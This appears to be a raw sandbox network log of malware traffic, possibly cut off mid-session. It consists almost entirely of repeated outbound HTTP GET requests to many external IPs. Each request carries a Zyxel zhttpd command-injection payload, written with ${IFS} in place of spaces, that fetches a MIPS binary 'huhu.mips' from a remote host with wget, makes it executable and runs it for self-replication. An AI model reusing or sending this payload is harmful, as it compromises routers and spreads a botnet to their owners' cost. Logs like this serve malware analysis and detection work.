                                      Jan 19, 2024 17:29:42.982433081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6903192.168.2.146036084.181.2.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982471943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6904192.168.2.1447934101.73.19.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982506037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6905192.168.2.145622498.102.92.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982577085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6906192.168.2.14366124.140.35.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982593060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6907192.168.2.1447448197.34.1.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982621908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6908192.168.2.1453234175.246.21.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982681036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6909192.168.2.1447774191.75.170.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982709885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6910192.168.2.145214640.242.170.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982742071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6911192.168.2.1439068140.169.142.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982790947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6912192.168.2.143790642.41.232.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982825994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6913192.168.2.143463879.131.241.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982852936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6914192.168.2.1438182193.238.119.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982908010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6915192.168.2.145270668.88.225.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982960939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6916192.168.2.1460876199.167.78.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983009100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6917192.168.2.143650886.159.217.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983042955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6918192.168.2.1440626195.250.19.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983088017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6919192.168.2.1455918195.182.155.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983093977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6920192.168.2.144582217.139.50.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983150959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6921192.168.2.1451362220.68.66.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983181000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6922192.168.2.1438658167.195.203.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983208895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6923192.168.2.1449546206.122.43.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983254910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6924192.168.2.145101238.128.79.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983314037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6925192.168.2.1460694184.93.59.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983357906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6926192.168.2.1456474101.243.41.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983421087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6927192.168.2.1456762200.42.238.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983454943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6928192.168.2.1435470134.11.3.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983505011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6929192.168.2.1459264154.197.197.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983531952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6930192.168.2.1434852185.206.112.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983597994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6931192.168.2.144248288.164.20.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983638048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6932192.168.2.1460584116.104.153.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983668089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6933192.168.2.1435936197.84.29.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983711004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6934192.168.2.1441198176.99.241.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983751059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6935192.168.2.1433388178.97.25.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983788013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6936192.168.2.143774235.11.83.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983845949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6937192.168.2.143483862.247.34.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983872890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6938192.168.2.1444212153.186.243.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983900070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6939192.168.2.145823218.171.110.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.983944893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6940192.168.2.144405614.162.1.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984009027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6941192.168.2.1446686199.134.243.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984031916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6942192.168.2.1451178185.112.80.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984071016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6943192.168.2.1454890161.101.233.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984133005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6944192.168.2.1455442162.101.224.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984158039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6945192.168.2.144713284.60.74.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984195948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6946192.168.2.1457748128.0.43.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984241962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6947192.168.2.14467304.211.198.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984286070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6948192.168.2.1455610223.66.53.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984338045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6949192.168.2.1440468115.46.5.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984364033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6950192.168.2.14331285.8.170.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984416008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6951192.168.2.145859659.236.98.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984447002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6952192.168.2.145509432.63.117.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984469891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6953192.168.2.1457934221.32.152.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984508991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6954192.168.2.1449418143.33.128.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984549046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6955192.168.2.1440642151.165.112.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984595060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6956192.168.2.1436820162.149.152.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984621048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6957192.168.2.1457210116.47.100.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984682083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6958192.168.2.144619281.144.168.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984734058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6959192.168.2.144757470.177.145.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984756947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6960192.168.2.1436866169.148.119.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984832048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6961192.168.2.1434628133.101.221.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984838009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6962192.168.2.1434040177.50.28.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984880924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6963192.168.2.1452528146.6.170.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984939098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6964192.168.2.144662657.214.129.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.984966040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6965192.168.2.1454168202.239.101.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985013008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6966192.168.2.145645889.166.212.111443
                                      TimestampBytes transferredDirectionData
